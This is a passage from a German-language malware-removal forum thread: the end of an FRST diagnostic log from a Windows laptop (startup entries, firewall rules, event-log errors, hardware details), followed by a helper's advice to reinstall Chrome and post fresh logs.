2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run: => "Samsung Link"
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Registry Helper"
HKLM\...\StartupApproved\Run32: => "fst_de_19"
HKLM\...\StartupApproved\Run32: => "t4pc_en_3"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe

==================== Wiederherstellungspunkte =========================
22-03-2016 02:55:07 JRT Pre-Junkware Removal
29-03-2016 12:45:27 Windows Modules Installer
30-03-2016 12:51:51 Revo Uninstaller's restore point - Google Chrome

==================== Fehlerhafte Geräte im Gerätemanager =============

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Systemfehler:
=============
Error: (03/31/2016 12:30:42 PM) (Source: bowser) (EventID: 8016) (User: )
Description: Der Suchdiensttreiber erhielt zu viele nicht erlaubte Datagramme vom Remotecomputer "O2BOX" zum Namen "SCHNEIDER" auf Transport "NetBT_Tcpip_{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}". Das Datagramm steht in den Daten. Es werden keine weiteren Ereignisse erzeugt, solange die Rücksetzfrequenz nicht abgelaufen ist.

Error: (03/30/2016 11:54:25 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: %%1275

Error: (03/30/2016 11:54:25 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Denny\AppData\Local\Temp\ehdrv.sys

Error: (03/30/2016 11:54:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: %%1275

Error: (03/30/2016 11:54:24 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Denny\AppData\Local\Temp\ehdrv.sys

Error: (03/30/2016 11:54:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: %%1275

Error: (03/30/2016 11:54:23 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Denny\AppData\Local\Temp\ehdrv.sys

Error: (03/30/2016 01:43:18 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

CodeIntegrity:
===================================
Date: 2016-01-27 20:34:50.024
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:33:27.259
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:32.120
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:31.842
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:21.532
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:21.366
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:19.557
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:13.438
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:00.333
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:00.166
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 3971.27 MB
Verfügbarer physikalischer RAM: 2637.68 MB
Summe virtueller Speicher: 8067.27 MB
Verfügbarer virtueller Speicher: 6257.06 MB

==================== Laufwerke ================================
Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:391.68 GB) NTFS

==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D)
Partition: GPT.

==================== Ende von Addition.txt ============================ |
31.03.2016, 12:34 | #15 |
/// Malwareteam | MPC Cleaner cannot be deleted (malware) That's what I'm here for :P Your Chrome still isn't right... Please download and reinstall Chrome -> remove it completely with Revo -> install Chrome again if you use it. After that, new logs again please.
__________________ Regards, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ |